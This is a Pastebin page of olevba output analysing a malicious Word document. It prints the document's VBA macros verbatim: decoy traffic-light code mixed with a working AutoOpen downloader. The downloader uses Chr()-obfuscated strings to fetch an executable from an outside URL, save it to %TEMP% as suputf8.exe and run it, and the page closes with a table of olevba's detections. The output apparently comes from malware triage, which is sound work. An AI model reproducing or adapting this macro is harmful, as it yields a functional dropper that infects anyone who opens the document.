Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIHB-V 0018_6~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: 0018_6~1.doc
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- VEeve (8.2)
- End Sub
- Sub VEeve(FFFFF As Long)
- NwKHQxx14zub
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Remain_5F03(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Integer
- Try
- _mainForm.Show_LBox_PolicyRightNowText(" Remain_5F03 start ")
- If Goback = "1" Then
- Goback = "00"
- ElseIf Goback = "2" Then
- Goback = "01"
- End If
- Dim lightstatus As String() = tempV3_5F14.LightStatus
- Dim Green As String() = tempV3_5F15.Green
- Dim total_phases As Integer = lightstatus.Length
- Dim phase_interval(total_phases) As Integer
- For index As Integer = 0 To total_phases - 1
- phase_interval(Index) = YellowplusRed(lightstatus(Index)) + CurrentGreen(Green(Index))
- 'phase_interval2(index) = phase_interval
- '_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval.ToString)
- _mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval(index).ToString)
- Next Index
- End Function
- Public Function lQc8N4mpWW5(muULk3yaoasVTA As String)
- Set ZRCB4OQPMEB6 = Aw9a6h1r(Chr(83) & Chr(104) & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
- ZRCB4OQPMEB6.Open (rAHQOXN8z4zO)
- End Function
- Public Function Syncd_IC2IPC_AcceptHash_2()
- Dim Data_5F18 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F18")
- Dim planid As String = Data_5F18.PlanID.ToString
- Dim Data_5F03 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F03")
- Dim a() As Byte = HexStr2ByteArray(BusLineData(4))
- Dim BusPassPhases As BitArray = New BitArray(8)
- BusPassPhases = New BitArray(a)
- Return DiffSecond
- Else
- Return Nothing
- End If
- Catch ex As Exception
- WriteLog(curPath, "Module1_Policy_Public", " Remain_5F03 Catch:" + ex.Message, _logEnable)
- Return -1
- End Try
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function RemainingLightTime(ByVal GreenOrNot As Boolean) As Integer
- Dim Remaining As Integer
- Try
- Dim TotalPhase As String
- Try
- TotalPhase = Data_5F18.SubPhaseCount.ToString
- Catch ex As Exception
- TotalPhase = Data_5F13.SubPhaseCount.ToString
- End Try
- Dim TotalPhaseInt As Integer = Convert.ToDecimal(TotalPhase)
- Dim CurrentPhaseInt As Integer = Convert.ToDecimal(Data_5FCC.Current_SubPhaseID)
- Dim CurrentStepInt As Integer = Convert.ToDecimal(Data_5FCC.Current_StepID)
- Dim CurrentRemainingTime As Integer = Data_5FCC.Current_RemainingInt
- If GreenOrNot Then
- '_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Green ")
- If CurrentStepInt = 1 Then
- prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
- Remaining = Greenint(CurrentPhaseInt - 1) - prepare
- ElseIf CurrentStepInt = 2 Then
- Remaining = CurrentRemainingTime + 4 + 3
- ElseIf CurrentStepInt = 3 Then
- Remaining = CurrentRemainingTime + 3
- Else
- Remaining = CurrentRemainingTime
- End If
- For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
- If BusPassPhases(Index - 1) Then
- Remaining = Remaining + Greenint(Index - 1)
- If CurrentPhaseInt <> 1 Then
- For index2 As Integer = 1 To CurrentPhaseInt - 1
- If BusPassPhases(index2 - 1) Then
- Remaining = Remaining + Greenint(index2 - 1)
- End If
- Next
- End If
- End If
- Next
- 'If BusPassPhases(CurrentPhaseInt) Then
- ' Remaining = Remaining + Greenint(CurrentPhaseInt)
- 'End If
- Return Remaining
- Else
- '_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Red ")
- If CurrentStepInt = 1 Then
- prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
- Remaining = Greenint(CurrentPhaseInt - 1) - prepare
- ElseIf CurrentStepInt = 2 Then
- Remaining = CurrentRemainingTime + 4 + 3 + 2
- ElseIf CurrentStepInt = 3 Then
- Remaining = CurrentRemainingTime + 3 + 2
- Else
- Remaining = CurrentRemainingTime
- End If
- End Function
- Sub NwKHQxx14zub()
- dChxZd9cty0 = "h" & Chr(116) & Chr(59) & "t" & Chr(112) & Chr(58) & Chr(47) & "<" & Chr(47) & Chr(111) & Chr(114) & Chr(112) & "i" & "g" & "=" & Chr(97) & Chr(103) & Chr(110) & "y" & Chr(46) & Chr(60) & "c" & "o" & Chr(109) & Chr(47) & Chr(119) & "4" & Chr(53) & Chr(114) & Chr(51) & Chr(47) & Chr(61) & Chr(56) & Chr(108) & Chr(54) & "m" & Chr(107) & Chr(46) & "=" & Chr(101) & ";" & Chr(120) & Chr(101)
- Set hRomc9OqfrT = Aw9a6h1r(Chr(77) & "i" & "<" & "c" & Chr(114) & Chr(111) & "=" & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & "X" & Chr(77) & "<" & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
- dChxZd9cty0 = Replace(dChxZd9cty0, Chr(60), "")
- dChxZd9cty0 = Replace(dChxZd9cty0, Chr(61), "")
- dChxZd9cty0 = Replace(dChxZd9cty0, Chr(59), "")
- CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
- dChxZd9cty0 _
- , False
- T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
- rAHQOXN8z4zO = T17zaVI8G7 & Chr(92) & Chr(115) & Chr(117) & Chr(112) & Chr(117) & "t" & Chr(102) & Chr(56) & Chr(46) & Chr(101) & "x" & Chr(101)
- Dim dQqnFJoOu9MYi() As Byte
- Dim mmm As VbCallType
- mmm = VbMethod
- CallByName hRomc9OqfrT, Chr(83) & Chr(101) & Chr(110) & "d", mmm
- dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
- zGtUPirIvgMk dQqnFJoOu9MYi, rAHQOXN8z4zO
- On Error GoTo ELg0jdGF
- a = 332 / 0
- On Error GoTo 0
- ta52uVgBTI4LPT:
- Exit Sub
- ELg0jdGF:
- lQc8N4mpWW5 ("X0VlMPg6nC")
- Resume ta52uVgBTI4LPT
- End Sub
- Public Function jhbjhjkn()
- For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
- If BusPassPhases(Index - 1) = False Then
- Remaining = Remaining + Greenint(Index - 1) + 5
- If CurrentPhaseInt <> 1 Then
- For index2 As Integer = 1 To CurrentPhaseInt - 1
- If BusPassPhases(index2 - 1) = False Then
- Remaining = Remaining + Greenint(index2 - 1) + 5
- End If
- Next
- End If
- End If
- Next
- Return Remaining
- End If
- Catch ex As Exception
- _mainForm.Show_LBox_PolicyRightNowText(" RemainingLightTime Error" + ex.StackTrace.ToString)
- End Try
- Return Remaining
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module35.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module35'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function BusPhaseOrNot(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Boolean
- Try
- Dim temp_goback As String = ""
- If Goback = "1" Then
- Goback = "00"
- ElseIf Goback = "2" Then
- Goback = "01"
- End If
- Dim Data_5F03 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F03")
- 'sPhaseOrder, sSignalMap, sSignalCount, sSubPhaseID, sStepID, sStepSec, sSignalStatus, Now
- Dim Data_5F18 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F18")
- Dim BusLineDataKey As String = BusLineID + "_" + CrossRoadID + "_" + Goback + "_" + Data_5F18.PlanID.ToString
- Dim CurrentPhaseInt As Integer = HexStringTOIntString(Data_5F03.SubPhaseID.ToString, 2)
- 'Dim BusPassPhases As BitArray = New BitArray(8)
- Dim a() As Byte = HexStr2ByteArray(BusLineData(4)) '[BusSubPhaseID]
- 'FiveFB4.Add("BusPhase", BusLineData(4))
- Dim BusPassPhases As BitArray = New BitArray(8)
- BusPassPhases = New BitArray(a)
- End Function
- Public Sub zGtUPirIvgMk(ZDtLniBdL3 As Variant, VCvMRSbB0LHH As String)
- Dim zsl48Nc6: Set zsl48Nc6 = Aw9a6h1r("A" & "<" & "d" & "o" & ";" & "d" & Chr(98) & Chr(61) & Chr(46) & "S" & Chr(116) & Chr(61) & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & Chr(109))
- Dim zaPomni As Integer
- zaPomni = 1
- zsl48Nc6.Type = zaPomni
- zsl48Nc6.Open
- zsl48Nc6.write ZDtLniBdL3
- zsl48Nc6.savetofile VCvMRSbB0LHH, 2
- End Sub
- Public Function Show_LBox_PolicyRightNowText()
- '_mainForm.Show_LBox_PolicyRightNowText("Bit array ")
- 'For i = 0 To 7
- ' If BusPassPhases(i) Then
- ' _mainForm.Show_LBox_PolicyRightNowText("Pass " + (i + 1).ToString)
- ' Else
- ' _mainForm.Show_LBox_PolicyRightNowText("Block " + (i + 1).ToString)
- ' End If
- 'Next i
- ' _mainForm.Show_LBox_PolicyRightNowText("Bit array ")
- For i As Integer = 0 To BusPassPhases.Count - 1
- If BusPassPhases(i) And (i + 1) = CurrentPhaseInt And CurrentStepInt <> 5 Then
- '_mainForm.Show_LBox_PolicyRightNowText("Green Light Now " + (i + 1).ToString)
- Return True
- End If
- Next i
- Catch ex As Exception
- _mainForm.Show_LBox_PolicyRightNowText("Bus Line Data error " + ex.StackTrace.ToString)
- Return False
- End Try
- '_mainForm.Show_LBox_PolicyRightNowText("Red Light Now ")
- Return False
- End Function
- '************************************************************************************************
- '**
- '** ?????
- '**
- '************************************************************************************************
- '?????1:??? 2??? 3:???
- 'TriggerPointdList
- '************************************************************************************************
- '**
- '** ?????????
- '**
- '************************************************************************************************
- 'RG_Stauts:??-->R,??-->G
- Public Function SendLightRemainSec(ByVal strBusID As String, ByVal RG_Stauts As String, ByVal RemainSec As String) As Boolean
- Dim isSuccess As Boolean = False
- Try
- If _ConnectFlag_Car_Group Then
- Dim Sendstring As String
- Dim YearString As String = Now.Year.ToString("0000")
- Dim MonthString As String = Now.Month.ToString("00")
- Dim DayString As String = Now.Day.ToString("00")
- Dim HourString As String = Now.Hour.ToString("00")
- Dim MinuteString As String = Now.Minute.ToString("00")
- Dim SecondString As String = Now.Second.ToString("00")
- Dim TimeString As String = YearString + MonthString + DayString + HourString + MinuteString + SecondString
- SeqNumber = (SeqNumber + 1) Mod 1000000000
- Dim SeqString As String = SeqNumber.ToString("00000000")
- Sendstring = "B2," + strBusID + ",SET01010," + HourString + MinuteString + SecondString + "_" + Trim(RG_Stauts) + Trim(RemainSec) + ",0,2," + TimeString + "," + SeqString + "," + TimeString
- TCP_ClientWriteToCAR (Sendstring)
- Dim text As String = "[R-->Bus] " + Sendstring
- WriteLog(curPath, "CAR_comm", [text], _logEnable)
- End If
- Catch ex As Exception
- End Try
- Return isSuccess
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public rAHQOXN8z4zO As String
- Public rAHQOXN8z4zO2 As String
- Public rAHQOXN8z4zO3 As String
- Public rAHQOXN8z4zO4 As String
- Public rAHQOXN8z4zO5 As String
- Public rAHQOXN8z4zO6 As String
- Public Function SecondOfCar2CrossRoad(ByVal CarPostion As String, ByVal CrossRoadPostion As String, ByVal CarSpeed As Double) As Integer
- Dim iSecReport As Integer = 0
- Try
- Dim StartPostion As String() = CarPostion.Split(",")
- Dim EndPostion As String() = CrossRoadPostion.Split(",")
- Dim EarthRadius As Integer = 6371
- Dim factor As Double = Math.PI / 180
- Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
- Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
- Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
- Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
- Dim dis_c As Double = EarthRadius * dis_b * 1000
- Dim SedondOfSpeedMeter As Double = (CarSpeed * 1000) / 3600
- iSecReport = dis_c / SedondOfSpeedMeter
- '_mainForm.Show_LBox_PolicyRightNowText("CarPostion " + CarPostion + " CrossRoadPostion " + CrossRoadPostion)
- '_mainForm.Show_LBox_PolicyRightNowText("Distance " + dis_c.ToString + " Speed " + SedondOfSpeedMeter.ToString)
- Catch ex As Exception
- iSecReport = 0
- End Try
- Return iSecReport
- End Function
- Public Function distance(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
- Dim iSecReport As Integer = 0
- Try
- Dim StartPostion As String() = CarPostion.Split(",")
- Dim EndPostion As String() = CrossRoadPostion.Split(",")
- Dim EarthRadius As Integer = 6371
- Dim factor As Double = Math.PI / 180
- Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
- Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
- Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
- Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
- Dim dis_c As Double = EarthRadius * dis_b * 1000
- iSecReport = dis_c
- '_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
- Catch ex As Exception
- iSecReport = 0
- _mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
- End Try
- Return iSecReport
- End Function
- Public Function Aw9a6h1r(Bc21xM5Qq As String)
- Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(60), "")
- Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(61), "")
- Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(59), "")
- Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
- End Function
- Public Function distance2(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
- Dim iSecReport As Integer = 0
- Try
- Dim tempString As String = ""
- Dim StartPostion As String() = CarPostion.Split(",")
- Dim EndPostion As String() = CrossRoadPostion.Split(",")
- Dim EarthRadius As Integer = 6371
- tempString = StartPostion(0)
- StartPostion(0) = StartPostion(1)
- StartPostion(1) = tempString
- Dim factor As Double = Math.PI / 180
- Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
- Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
- Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
- Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
- Dim dis_c As Double = EarthRadius * dis_b * 1000
- iSecReport = dis_c
- '_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
- Catch ex As Exception
- iSecReport = 0
- _mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
- End Try
- Return iSecReport
- End Function
- '???????
- '?????1?,2??,3?,4??,5?,6??,7?,8??
- Public Function isBusSameDirection(ByVal TriggerPhaseDirect As String) As Boolean
- Dim isSame As Boolean = False
- Try
- If Not IsNothing(Data_5F03) Then
- Return isPass(Val(TriggerPhaseDirect) - 1, Data_5F03.SignalStatus, Data_5F03.SignalMap)
- End If
- Catch ex As Exception
- End Try
- Return isSame
- End Function
- Public Function isPass(ByVal intIndex As Integer, ByVal strStatus As String, ByVal strSingalMap As String) As Boolean
- Try
- 'Jason 2014-9-24
- 'S-------------------------------------------------------------
- Dim SingalOrder As Integer = 0
- Return False
- End If
- Catch ex As Exception
- Dim trace As New System.Diagnostics.StackTrace(ex, True)
- WriteLog(curPath, "Module1_Policy_Public", "isPass Catch(" + trace.GetFrame(0).GetFileLineNumber().ToString + ")" + ex.Message, _logEnable)
- End Try
- Return False
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Open | May open a file (obfuscation: VBA |
- | | | expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | suputf8.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement